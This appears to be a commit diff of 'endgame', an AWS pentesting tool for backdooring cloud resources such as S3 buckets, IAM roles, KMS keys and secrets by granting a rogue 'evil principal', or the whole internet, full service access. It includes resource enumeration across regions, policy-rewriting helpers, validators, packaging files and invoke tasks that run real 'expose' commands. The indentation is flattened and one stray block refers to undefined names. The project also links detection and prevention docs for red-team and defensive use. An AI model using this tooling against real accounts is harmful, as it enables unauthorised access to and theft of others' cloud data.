current_account_id=self.current_account_id,
profile=self.profile,
cloak=self.cloak)
resources.extend(service_resources.resources)
return resources
def arns(self) -> [str]:
"""Get all the resource ARNs from all specified services from all specified regions"""
arns = []
if self.user_provided_service == "all":
for supported_service in constants.SUPPORTED_AWS_SERVICES:
if supported_service not in self.excluded_services:
if supported_service != "all":
service_resources = ServiceResourcesMultiRegion(user_provided_service=supported_service,
user_provided_region=self.user_provided_region,
current_account_id=self.current_account_id,
profile=self.profile,
cloak=self.cloak)
arns.extend(service_resources.arns)
else:
service_resources = ServiceResourcesMultiRegion(user_provided_service=self.user_provided_service,
user_provided_region=self.user_provided_region,
current_account_id=self.current_account_id,
profile=self.profile,
cloak=self.cloak)
arns.extend(service_resources.arns)
return arns
class ServiceResourcesMultiRegion:
def __init__(
self,
user_provided_service: str,
user_provided_region: str,
current_account_id: str,
profile: str = None,
cloak: bool = False
):
self.user_provided_service = user_provided_service
self.boto_service = utils.get_service_translation(provided_service=user_provided_service)
self.user_provided_region = user_provided_region
self.current_account_id = current_account_id
self.profile = profile
self.cloak = cloak
self.regions = self._regions()
# Save the name of the service for boto3 usage
self.resources = self._resources()
def _regions(self) -> list:
"""List of regions to list things for."""
if self.user_provided_region == "all":
regions = get_available_regions(self.boto_service)
else:
regions = [self.user_provided_region]
return regions
def _resources(self) -> [ListResourcesResponse]:
"""Get all the resources within specified regions"""
resources = []
for region in self.regions:
logger.debug(f"Listing resources for {self.user_provided_service} in {region}")
try:
region_resources = ServiceResourcesSingleRegion(user_provided_service=self.user_provided_service,
region=region,
current_account_id=self.current_account_id,
profile=self.profile,
cloak=self.cloak)
resources.extend(region_resources.resources.resources)
except botocore.exceptions.ClientError as error:
logger.debug(f"The service {self.boto_service} might not exist in the region {region}. Error: {error}")
return resources
@property
def arns(self) -> [str]:
arns = []
for resource in self.resources:
arns.append(resource.arn)
return arns
class ServiceResourcesSingleRegion:
"""A list of all the resources under a particular service in a particular region"""
def __init__(
self,
user_provided_service: str,
region: str,
current_account_id: str,
profile: str = None,
cloak: bool = False
):
self.user_provided_service = user_provided_service
# Save the name of the service for boto3 usage
self.boto_service = utils.get_service_translation(provided_service=user_provided_service)
self.region = region
self.current_account_id = current_account_id
self.client = get_boto3_client(profile=profile, service=self.boto_service, region=self.region, cloak=cloak)
self.resources = self._resources()
@property
def arns(self) -> [str]:
arns = []
results = self.resources
for resource in results.resources:
arns.append(resource.arn)
return arns
def _resources(self) -> [ListResourcesResponse]:
resources = None
if self.user_provided_service == "acm-pca":
resources = acm_pca.AcmPrivateCertificateAuthorities(client=self.client,
current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "ecr":
resources = ecr.EcrRepositories(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "efs":
resources = efs.ElasticFileSystems(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "elasticsearch":
resources = elasticsearch.ElasticSearchDomains(client=self.client,
current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "glacier":
resources = glacier_vault.GlacierVaults(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "iam":
resources = iam.IAMRoles(client=self.client, current_account_id=self.current_account_id, region=self.region)
elif self.user_provided_service == "kms":
resources = kms.KmsKeys(client=self.client, current_account_id=self.current_account_id, region=self.region)
elif self.user_provided_service == "lambda":
resources = lambda_function.LambdaFunctions(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "lambda-layer":
resources = lambda_layer.LambdaLayers(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "cloudwatch":
resources = cloudwatch_logs.CloudwatchResourcePolicies(client=self.client,
current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "s3":
resources = s3.S3Buckets(client=self.client, current_account_id=self.current_account_id, region=self.region)
elif self.user_provided_service == "ses":
resources = ses.SesIdentityPolicies(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "sns":
resources = sns.SnsTopics(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "sqs":
resources = sqs.SqsQueues(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "secretsmanager":
resources = secrets_manager.SecretsManagerSecrets(client=self.client,
current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "rds":
resources = rds_snapshots.RdsSnapshots(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "ebs":
resources = ebs_snapshots.EbsSnapshots(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "ec2-ami":
resources = ec2_amis.Ec2Images(client=self.client, current_account_id=self.current_account_id,
region=self.region)
return resources
"""
if region == "all":
logger.info("Listing resources in ALL regions")
regions = get_available_regions(translated_service)
logger.debug(f"Regions available: {', '.join(regions)}")
for region in regions:
list_resources_by_region(service=service, profile=profile, region=self.region, cloak=cloak,
excluded_names=excluded_names, current_account_id=self.current_account_id)
else:
logger.info("Listing resources in %s" % region)
list_resources_by_region(service=service, profile=profile, region=self.region, cloak=cloak,
excluded_names=excluded_names, current_account_id=self.current_account_id)
"""

View File

@ -0,0 +1,64 @@
"""
Classes for managing responses from the various exposure classes. Instead of `undo`, `add_myself`, and `set_rbp`
each returning a differently shaped dict, these classes standardize the way messages are sent back from those
functions.
"""
import logging
from policy_sentry.util.arns import get_resource_path_from_arn
from endgame.shared.validate import validate_basic_policy_json
from endgame.shared import utils
from endgame.shared.policy_document import PolicyDocument
logger = logging.getLogger(__name__)
class ResponseMessage:
def __init__(self, message: str, operation: str, success: bool, victim_resource_arn: str, evil_principal: str,
original_policy: dict, updated_policy: dict, resource_type: str, resource_name: str, service: str):
self.message = message
self.operation = operation
self.success = success
self.evil_principal = evil_principal
self.victim_resource_arn = victim_resource_arn
self.original_policy = validate_basic_policy_json(original_policy)
self.updated_policy = validate_basic_policy_json(updated_policy)
self.resource_type = resource_type
self.resource_name = resource_name
self.service = service
@property
def updated_policy_sids(self) -> list:
return utils.get_sid_names_with_error_handling(self.updated_policy)
@property
def original_policy_sids(self) -> list:
return utils.get_sid_names_with_error_handling(self.original_policy)
@property
    def victim_resource_name(self) -> str:
        resource_name = get_resource_path_from_arn(self.victim_resource_arn)
        return resource_name
@property
def evil_principal_name(self) -> str:
principal_name = get_resource_path_from_arn(self.evil_principal)
return principal_name
@property
def added_sids(self) -> list:
diff = []
if len(self.updated_policy_sids) > len(self.original_policy_sids):
diff = list(set(self.updated_policy_sids) - set(self.original_policy_sids))
return diff
@property
def removed_sids(self) -> list:
diff = []
if len(self.original_policy_sids) > len(self.updated_policy_sids):
diff = list(set(self.original_policy_sids) - set(self.updated_policy_sids))
return diff
class ResponseGetRbp:
def __init__(self, policy_document, success):
self.policy_document = policy_document
self.success = success
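A minimal sketch (not part of the original module) of how the Sid diff properties behave; the policies and ARNs are invented:

# Hypothetical sketch: added_sids/removed_sids are set differences over the Sid
# names of the original vs. updated policy. All values below are invented.
original = {"Version": "2012-10-17", "Statement": [
    {"Sid": "AllowCurrentAccount", "Effect": "Allow",
     "Principal": {"AWS": ["arn:aws:iam::111122223333:root"]},
     "Action": ["s3:*"], "Resource": ["*"]},
]}
updated = {"Version": "2012-10-17", "Statement": original["Statement"] + [
    {"Sid": "Endgame", "Effect": "Allow",
     "Principal": {"AWS": ["arn:aws:iam::999988887777:user/evil"]},
     "Action": ["s3:*"], "Resource": ["*"]},
]}
response = ResponseMessage(
    message="success", operation="add_myself", success=True,
    victim_resource_arn="arn:aws:s3:::victim-bucket",
    evil_principal="arn:aws:iam::999988887777:user/evil",
    original_policy=original, updated_policy=updated,
    resource_type="bucket", resource_name="victim-bucket", service="s3",
)
print(response.added_sids)    # -> ['Endgame']
print(response.removed_sids)  # -> []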

View File

@ -0,0 +1,24 @@
from endgame.shared import utils
def confirm_anonymous_principal():
utils.print_red(r"""
""")
print("\n")
utils.print_red("WARNING:")
confirm = input("You are about to expose resources to the ENTIRE INTERNET. Are you sure you want to do that? [y/N]")
if confirm.lower() == 'y':
return True
else:
return False

View File

@ -0,0 +1,133 @@
import json
from policy_sentry.util.arns import get_account_from_arn
# pylint: disable=too-many-instance-attributes
class StatementDetail:
"""
Analyzes individual statements within a policy
"""
def __init__(
self,
statement: dict,
service: str,
override_action: str = None,
override_account_id_instead_of_principal: bool = False
):
self.json = statement
self.statement = statement
self.sid = statement.get("Sid", "")
self.effect = statement["Effect"]
self.service = service
self.override_action = override_action
self.override_account_id_instead_of_principal = override_account_id_instead_of_principal
self.resources = self._resources()
self.actions = self._actions()
self.aws_principals = self._aws_principals()
self.other_principals = self._other_principals()
self.condition = statement.get("Condition", None)
self.not_action = statement.get("NotAction", None)
self.not_principal = statement.get("NotPrincipal", None)
self.not_resource = statement.get("NotResource", None)
def __str__(self) -> str:
principals_block = {}
result = {
"Sid": self.sid,
"Effect": self.effect,
}
if self.aws_principals:
principals_block["AWS"] = self.aws_principals
if self.other_principals:
principals_block.update(self.other_principals)
result["Principal"] = principals_block
if self.resources:
result["Resource"] = self.resources
if self.actions:
result["Action"] = self.actions
if self.condition:
result["Condition"] = self.condition
if self.not_action:
result["NotAction"] = self.not_action
if self.not_principal:
result["NotPrincipal"] = self.not_principal
if self.not_resource:
result["NotResource"] = self.not_resource
return json.dumps(result)
def _original_actions(self):
"""Holds the actions from the original JSON"""
actions = self.statement.get("Action")
if not actions:
return []
if not isinstance(actions, list):
actions = [actions]
return actions
def _actions(self):
"""Holds the actions in a statement"""
# IAM Roles have a special case where you don't just provide "iam:*" like other resource based policies
# - you have to provide sts:AssumeRole. For that special case, we need to be able to override the action
# in this method.
if self.override_action:
if "," in self.override_action:
action_block = self.override_action.split(",")
else:
action_block = self.override_action
else:
# If override action is not supplied, just give full access to the whole service 🤡
action_block = [f"{self.service}:*"]
return action_block
def _resources(self):
"""Holds the resource ARNs in a statement"""
resources = self.statement.get("Resource")
if not resources:
return []
# If it's a string, turn it into a list
if not isinstance(resources, list):
resources = [resources]
return resources
def _aws_principals(self):
"""Holds the principal ARNs in a statement"""
principals_block = self.statement.get("Principal")
principals = []
if isinstance(principals_block, str):
principals = principals_block
elif isinstance(principals_block, dict):
principals = principals_block.get("AWS", None)
if not principals:
return []
# If it's a string, turn it into a list
if not isinstance(principals, list):
principals = [principals]
if self.override_account_id_instead_of_principal:
updated_principals = []
for principal in principals:
# Case: Principal = *
if principal == "*":
updated_principals.append(principal)
# Case: principal = "arn:aws:iam::999988887777:user/mwahahaha"
elif ":" in principal:
updated_principals.append(get_account_from_arn(principal))
# Case: principal = 999988887777
else:
updated_principals.append(principal)
return updated_principals
else:
return principals
def _other_principals(self) -> dict:
principals_block = self.statement.get("Principal")
other_principals = {}
if isinstance(principals_block, str):
other_principals["*"] = principals_block
else:
for principal_type in principals_block:
if principal_type != "AWS":
other_principals[principal_type] = principals_block[principal_type]
return other_principals
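A short round-trip sketch (not part of the original module; the account ID and ARNs are invented) showing how a raw statement is parsed and re-serialized:

# Hypothetical sketch: parse a raw statement dict, then inspect the normalized fields.
raw_statement = {
    "Sid": "AllowCurrentAccount",
    "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::111122223333:root"},
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::victim-bucket/*",
}
detail = StatementDetail(
    statement=raw_statement,
    service="s3",
    override_account_id_instead_of_principal=True,
)
print(detail.actions)         # -> ['s3:*'] (no override_action supplied, so full service access)
print(detail.aws_principals)  # -> ['111122223333'] (ARN collapsed to the bare account ID)
print(json.loads(str(detail))["Resource"])  # -> ['arn:aws:s3:::victim-bucket/*']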

139
endgame/shared/utils.py Normal file
View File

@ -0,0 +1,139 @@
import copy
import logging
from colorama import Fore, Back
from policy_sentry.util.policy_files import get_sid_names_from_policy
from policy_sentry.util.arns import get_account_from_arn
from endgame.shared import constants
logger = logging.getLogger(__name__)
END = "\033[0m"
GREY = "\33[90m"
def get_sid_names_with_error_handling(policy):
try:
sid_names = get_sid_names_from_policy(policy)
    # This happens when there is no Sid to be found, so the list of Sid names is empty.
except TypeError as error:
logger.debug(error)
sid_names = []
except KeyError as error:
logger.debug("There is no SID name in the policy")
logger.debug(error)
sid_names = [""]
return sid_names
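# Hypothetical sketch (not part of the module): on a well-formed policy the wrapper
# simply returns the Sid names; Sid-less or malformed policies fall back to [] or [""]
# instead of raising.
policy = {"Version": "2012-10-17", "Statement": [
    {"Sid": "Endgame", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": "s3:*", "Resource": "*"},
]}
print(get_sid_names_with_error_handling(policy))  # -> ['Endgame']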
def get_service_translation(provided_service: str) -> str:
"""We have to take a user-supplied service (which is named for their understanding) and transform it into the IAM
service. Example is cloudwatch resource policies being `logs`; `logs` is harder to remember than `cloudwatch`."""
if provided_service == "cloudwatch":
actual_service = "logs"
elif provided_service == "lambda-layer":
actual_service = "lambda"
elif provided_service == "elasticsearch":
actual_service = "es"
elif provided_service == "elasticfilesystem":
actual_service = "efs"
elif provided_service == "ebs":
actual_service = "ec2"
elif provided_service == "ec2-ami":
actual_service = "ec2"
else:
actual_service = provided_service
return actual_service
def change_policy_principal_from_arn_to_account_id(policy: dict) -> dict:
"""
Some policies like CloudWatch, SNS, SQS, and Lambda require that you submit the policy using
Principal: {'AWS': '999888777'}
But the policy that is returned from API call includes a full ARN like:
Principal: {'AWS': 'arn:aws:iam::999888777:root'}
This utility function transforms the latter into the former.
"""
temp_statements = policy.get("Statement")
updated_policy = constants.get_empty_policy()
    if isinstance(temp_statements, dict):
        # A single statement was supplied as a dict; wrap it in a list so it can be iterated over
        temp_policy = constants.get_empty_policy()
        temp_policy["Statement"].append(copy.deepcopy(temp_statements))
else:
temp_policy = copy.deepcopy(policy)
statements = temp_policy.get("Statement")
for statement in statements:
new_statement = {}
try:
aws_principal = statement["Principal"]["AWS"]
new_account_ids = []
# case: statement["Principal"]["AWS"] = list()
if isinstance(aws_principal, list):
for principal in aws_principal:
# case: principal = "*"
if principal == "*":
new_account_ids.append(principal)
# case: principal = "arn:aws:iam::999888777:root"
elif ":" in principal:
new_account_ids.append(get_account_from_arn(principal))
# case: principal = "999888777"
else:
new_account_ids.append(principal)
else:
if aws_principal == "*":
new_account_ids.append(aws_principal)
elif ":" in aws_principal:
new_account_ids.append(get_account_from_arn(aws_principal))
else:
new_account_ids.append(aws_principal)
new_statement = copy.deepcopy(statement)
new_statement["Principal"]["AWS"] = new_account_ids
updated_policy["Statement"].append(copy.deepcopy(new_statement))
# If statement["Principal"]["AWS"] does not exist, just copy the statement to the new policy
        except (KeyError, TypeError):
updated_policy["Statement"].append(statement)
return updated_policy
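# Hypothetical before/after sketch for the ARN-to-account-ID transformation above
# (not part of the module; the account ID is invented).
before = {"Version": "2012-10-17", "Statement": [
    {"Sid": "Endgame", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::999988887777:root"},
     "Action": "sqs:*", "Resource": "*"},
]}
after = change_policy_principal_from_arn_to_account_id(before)
print(after["Statement"][0]["Principal"]["AWS"])  # -> ['999988887777']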
def print_red(string):
print(f"{Fore.RED}{string}{END}")
def print_yellow(string):
print(f"{Fore.YELLOW}{string}{END}")
def print_blue(string):
print(f"{Fore.BLUE}{string}{END}")
def print_green(string):
print(f"{Fore.GREEN}{string}{END}")
def print_grey(string):
print(f"{GREY}{string}{END}")
# Color code from here: https://stackoverflow.com/a/39452138
def print_remove(service: str, resource_type: str, resource_name: str, principal_type: str, principal_name: str, success: bool):
resource_message_string = f"{service.upper()} {resource_type.capitalize()} {resource_name}"
remove_string = f"Remove {principal_type} {principal_name}"
if success:
success_string = f"{Fore.GREEN}SUCCESS{END}"
else:
success_string = f"{Fore.RED}FAILED{END}"
message = f"{resource_message_string:<}: {remove_string}"
print(f"{message:<80}{success_string:>20}")
# print_blue(f"{message:<80}{success_string:>20}")
def print_add(service: str, resource_type: str, resource_name: str, principal_type: str, principal_name: str, success: bool):
resource_message_string = f"{service.upper()} {resource_type.capitalize()} {resource_name}"
add_string = f"Add {principal_type} {principal_name}"
if success:
success_string = f"{Fore.GREEN}SUCCESS{END}"
else:
success_string = f"{Fore.RED}FAILED{END}"
message = f"{resource_message_string:<}: {add_string}"
# print_blue(f"{message:<80}{success_string:>20}")
print(f"{message:<80}{success_string:>20}")

View File

@ -0,0 +1,81 @@
import logging
import click
from endgame.shared.constants import SUPPORTED_AWS_SERVICES
from policy_sentry.util.arns import get_service_from_arn
from policy_sentry.util.arns import parse_arn_for_resource_type
logger = logging.getLogger(__name__)
def click_validate_supported_aws_service(ctx, param, value):
if value in SUPPORTED_AWS_SERVICES:
return value
else:
raise click.BadParameter(
f"Supply a supported AWS service. Supported services are: {', '.join(SUPPORTED_AWS_SERVICES)}"
)
def click_validate_comma_separated_resource_names(ctx, param, value):
if value is not None:
try:
if value == "":
return []
else:
exclude_resource_names = value.split(",")
return exclude_resource_names
except ValueError:
raise click.BadParameter("Supply the list of resource names to exclude from results in a comma separated string.")
def click_validate_comma_separated_excluded_services(ctx, param, value):
if value is not None:
try:
if value == "":
return []
else:
excluded_services = value.split(",")
for service in excluded_services:
if service not in SUPPORTED_AWS_SERVICES:
raise click.BadParameter(f"The service name {service} is invalid. Please provide a comma "
f"separated list of supported services from the list: "
f"{','.join(SUPPORTED_AWS_SERVICES)}")
return excluded_services
except ValueError:
raise click.BadParameter("Supply the list of resource names to exclude from results in a comma separated string.")
def click_validate_user_or_principal_arn(ctx, param, value):
if validate_user_or_principal_arn(value):
return value
else:
raise click.BadParameter(
f"Please supply a valid IAM principal ARN (a user or a role)"
)
def validate_user_or_principal_arn(arn: str):
if arn.strip('"').strip("'") == "*":
return True
else:
service = get_service_from_arn(arn)
resource_type = parse_arn_for_resource_type(arn)
# Make sure it is an IAM ARN
if service != "iam":
raise Exception("Please supply a valid IAM principal ARN (a user or a role)")
# Make sure that it is a user or a role
elif resource_type not in ["user", "role"]:
raise Exception("Please supply a valid IAM principal ARN (a user or a role)")
else:
return True
def validate_basic_policy_json(policy_json: dict) -> dict:
# Expect Statement in policy
if "Version" not in policy_json or "Statement" not in policy_json:
logger.warning("Policy does not have either 'Version' or 'Statement' block in it.")
policy = {"Version": "2012-10-17", "Statement": []}
return policy
else:
if not isinstance(policy_json.get("Statement"), list):
logger.warning("'Statement' in Policy should be a list (ideally) or a dict")
return policy_json
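A brief sketch of the two validators above (ARN invented; not part of the module):

# Hypothetical sketch of the validators above.
validate_user_or_principal_arn("arn:aws:iam::999988887777:user/mwahahaha")  # -> True
validate_user_or_principal_arn("*")                                         # -> True

# A policy missing the Version/Statement blocks is replaced with an empty skeleton.
print(validate_basic_policy_json({}))
# -> {'Version': '2012-10-17', 'Statement': []}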

59
mkdocs.yml Normal file
View File

@ -0,0 +1,59 @@
site_name: Endgame
site_url: https://endgame.readthedocs.io/
repo_url: https://github.com/agnivesh/endgame/
theme: material
use_directory_urls: true
markdown_extensions:
- codehilite
- tables
plugins:
- search
- mkdocstrings:
default_handler: python
handlers:
python:
rendering:
show_source: true
watch:
- endgame/
extra_css:
- custom.css
nav:
- Home: 'index.md'
- Installation: 'installation.md'
- Tutorial: 'tutorial.md'
- Detection: 'detection.md'
- Prevention: 'prevention.md'
- Recommendations To AWS: 'recommendations-to-aws.md'
- Permissions: 'iam-permissions.md'
- "<b>Backdoor Resource Types</b>":
- ACM Private CAs: 'risks/acm-pca.md'
- CloudWatch: 'risks/logs.md'
- Elastic Block Store (EBS): 'risks/ebs.md'
- EC2 Machine Images (AMIs): 'risks/amis.md'
- Elastic Container Registry (ECR): 'risks/ecr.md'
- Elastic File System (EFS): 'risks/efs.md'
- ElasticSearch: 'risks/es.md'
- Glacier Vaults: 'risks/glacier.md'
- IAM Roles: 'risks/iam-roles.md'
- KMS Keys: 'risks/kms.md'
- Lambda Functions: 'risks/lambda-functions.md'
- Lambda Layers: 'risks/lambda-layers.md'
- RDS Snapshots: 'risks/rds-snapshots.md'
- S3 Buckets: 'risks/s3.md'
- Secrets Manager: 'risks/secretsmanager.md'
- SES Authorized Senders: 'risks/ses.md'
- SNS Topics: 'risks/sns.md'
- SQS Queues: 'risks/sqs.md'
- "<b>Contributing</b>":
- Contributing: 'contributing/contributing.md'
- Testing: 'contributing/testing.md'
- "<b>Appendices</b>":
- Terraform Demo Infrastructure: 'appendices/terraform-demo-infrastructure.md'
- ACM PCA Activation: 'appendices/acm-pca-activation.md'
- Roadmap: 'appendices/roadmap.md'
- FAQ: 'appendices/faq.md'
- Resource Policy Primer: 'resource-policy-primer.md'

15
requirements-dev.txt Normal file
View File

@ -0,0 +1,15 @@
pytest==6.2.2
nose==1.3.7
black==20.8b1
bandit==1.7.0
coverage==5.4
pylint==2.6.0
invoke==1.5.0
pandas==1.2.2
openpyxl==3.0.6
moto==1.3.16
mkdocs==1.1.2
mkdocs-material==6.2.8
mkdocs-material-extensions==1.0.1
mkdocstrings==0.14.0
rsa>=4.7 # not directly required, pinned by Snyk to avoid a vulnerability

5
requirements.txt Normal file
View File

@ -0,0 +1,5 @@
click==7.1.2
botocore==1.20.5
boto3==1.17.5
policy_sentry==0.11.5
colorama==0.4.4

31
setup.cfg Normal file
View File

@ -0,0 +1,31 @@
[nosetests]
exe = True
tests = test/, test/command, test/shared, test/exposure_via_resource_policies
verbosity=2
[tool:pytest]
testpaths = test
#verbosity=2
python_files=test/*/test_*.py
#ignore= __pycache__ *.pyc
norecursedirs = .svn _build tmp* __pycache__
# Exclude: __pycache__ / .pyc
[coverage:run]
;include =
; # endgame only
; endgame/*
;source=endgame/*
omit =
# omit anything in a .local directory anywhere
*/.local/*
*/virtualenv/*
*/venv/*
*/.venv/*
*/docs/*
*/examples/*
utils/*
# omit everything in /usr
; /usr/*
# omit this single file
; utils/tirefire.py

50
setup.py Normal file
View File

@ -0,0 +1,50 @@
"""Setup script"""
import setuptools
import os
import re
HERE = os.path.abspath(os.path.dirname(__file__))
VERSION_RE = re.compile(r"""__version__ = ['"]([0-9.]+)['"]""")
TESTS_REQUIRE = ["coverage", "nose", "pytest", "moto[s3]"]
def get_version():
init = open(os.path.join(HERE, "endgame", "bin", "version.py")).read()
return VERSION_RE.search(init).group(1)
def get_description():
return open(
os.path.join(os.path.abspath(HERE), "README.md"), encoding="utf-8"
).read()
setuptools.setup(
name="endgame",
include_package_data=True,
version=get_version(),
author="Kinnaird McQuade",
author_email="kinnairdm@gmail.com",
description="An AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or to the entire internet 😈",
long_description=get_description(),
long_description_content_type="text/markdown",
url="https://github.com/salesforce/endgame",
packages=setuptools.find_packages(exclude=["test*"]),
tests_require=TESTS_REQUIRE,
install_requires=[
"botocore",
"boto3",
"click",
"policy_sentry>=0.11.5",
"colorama",
],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
entry_points={"console_scripts": "endgame=endgame.bin.cli:main"},
zip_safe=True,
keywords="aws iam security",
python_requires=">=3.7",
)

124
tasks.py Normal file
View File

@ -0,0 +1,124 @@
#!/usr/bin/env python
import sys
import os
import logging
from invoke import task, Collection
BIN = os.path.abspath(os.path.join(os.path.dirname(__file__), "endgame", "bin", "cli.py"))
sys.path.append(
os.path.abspath(
os.path.join(os.path.dirname(__file__), os.path.pardir, "endgame")
)
)
logger = logging.getLogger(__name__)
# services that we will expose in these tests
EXPOSE_SERVICES = [
"iam",
"ecr",
# "secretsmanager",
"lambda"
]
# services to run the list-resources command against
LIST_SERVICES = [
"iam",
"lambda",
"ecr",
"efs",
"secretsmanager",
"s3"
]
EVIL_PRINCIPAL = os.getenv("EVIL_PRINCIPAL")
if not os.getenv("EVIL_PRINCIPAL"):
raise Exception("Please set the EVIL_PRINCIPAL environment variable to the ARN of the rogue principal that you "
"want to give access to.")
# Create the necessary collections (namespaces)
ns = Collection()
test = Collection("test")
ns.add_collection(test)
# def exception_handler(func):
# def inner_function(*args, **kwargs):
# try:
# func(*args, **kwargs)
# except UnexpectedExit as u_e:
# logger.critical(f"FAIL! UnexpectedExit: {u_e}")
# sys.exit(1)
# except Failure as f_e:
# logger.critical(f"FAIL: Failure: {f_e}")
# sys.exit(1)
#
# return inner_function
# BUILD
@task
def build_package(c):
"""Build the policy_sentry package from the current directory contents for use with PyPi"""
c.run('python -m pip install --upgrade setuptools wheel')
c.run('python setup.py -q sdist bdist_wheel')
@task(pre=[build_package])
def install_package(c):
"""Install the package built from the current directory contents (not PyPi)"""
c.run('pip3 install -q dist/endgame-*.tar.gz')
@task
def create_terraform(c):
c.run("make terraform-demo")
@task
def destroy_terraform(c):
c.run("make terraform-destroy")
# @exception_handler
# @task(pre=[create_terraform], post=[destroy_terraform])
# @task
@task(pre=[install_package])
def list_resources(c):
for service in LIST_SERVICES:
c.run(f"echo '\nListing {service}'", pty=True)
# @exception_handler
# @task(pre=[create_terraform], post=[destroy_terraform])
@task
def expose_dry_run(c):
"""DRY RUN"""
for service in EXPOSE_SERVICES:
c.run(f"{BIN} expose --service {service} --name test-resource-exposure --dry-run", pty=True)
# @exception_handler
# @task(pre=[create_terraform], post=[destroy_terraform])
@task
def expose_undo(c):
"""Test the undo capability, even though we will destroy it after anyway (just to test the capability)"""
c.run(f"echo 'Exposing the Terraform infrastructure to {EVIL_PRINCIPAL}'")
for service in EXPOSE_SERVICES:
c.run(f"{BIN} expose --service {service} --name test-resource-exposure ", pty=True)
c.run(f"echo 'Undoing the exposure to {EVIL_PRINCIPAL} before destroying, just to be extra sure and to test "
f"it out.'")
c.run(f"{BIN} expose --service {service} --name test-resource-exposure --undo", pty=True)
# @exception_handler
# @task(pre=[create_terraform], post=[destroy_terraform])
@task
def expose(c):
"""REAL EXPOSURE TO ROGUE ACCOUNT"""
for service in EXPOSE_SERVICES:
c.run(f"echo 'Exposing the Terraform infrastructure to {EVIL_PRINCIPAL}'")
c.run(f"{BIN} expose --service {service} --name test-resource-exposure", pty=True)
test.add_task(list_resources, "list-resources")
test.add_task(expose_dry_run, "expose-dry-run")
test.add_task(expose_undo, "expose-undo")
test.add_task(expose, "expose")

Some files were not shown because too many files have changed in this diff